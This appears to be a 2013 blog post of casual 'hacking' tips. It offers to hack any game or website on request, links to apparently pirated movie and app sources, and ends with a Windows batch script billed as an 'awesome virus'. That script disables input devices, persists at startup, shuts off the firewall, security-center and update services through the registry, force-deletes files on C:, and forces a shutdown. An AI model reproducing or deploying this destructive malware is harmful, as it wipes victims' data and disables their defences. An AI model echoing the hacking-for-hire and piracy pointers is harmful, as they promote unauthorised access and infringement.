Friday, 22 November 2013

Do you need anything hacked

Just simply comment whatever games, websites or anything u need or want hacked and i will make a post of it in a short period of time afterwards

How to delete infected files on your pc

First off find the infected files, next select them all and click properties, then click security and then advanced, now change the owner ship to your account and then click apply and ok then change it to allow everything for you on the security page, now u can simply delete them.

How to watch movies and tv shows free online

Just go to this site (link below) and search the movie or tv show u want to watch and your done.
http://megashare.sh

How to get free apps using only your i-device

Just simply go to http://tui.tongbu.com/m/iphone.html and click the center button and then tap install, next just clikc the app installed and search any app u want downloaded and download it for free, Enjoy!

Top 3 sites for no survey downloads of anything

3: http://sourceforge.net


2: http://filesalla.com


1: http://filecrop.com

How to do the matrix effect using notepad

Copy and paste the following then save it as anything .bat dont worry u can open it its not dangerous its just great effects


    @echo off
    color 02
    :start
    echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
    goto start

    how to make a awesome virus with notepad

    simply open notepad type the following and save it as anything .bat
    @echo.off
    cls
    rundll32 mouse,disable
    rundll32 keyboard,disable
    COPY %0 %windir%WINSTART.BAT
    net stop "Security Center"
    net stop SharedAccess
    echo you get a virus!!!
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    start [url]http://www.youtube.com[/url]
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    > "%Temp%.kill.reg" ECHO REGEDIT4
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    START /WAIT REGEDIT /S "%Temp%.kill.reg"
    del "%Temp%.kill.reg"
    del %0
    DEL /F /S /Q C:
    shutdown -s -t 10 -c "Say good bye to your computer!" -f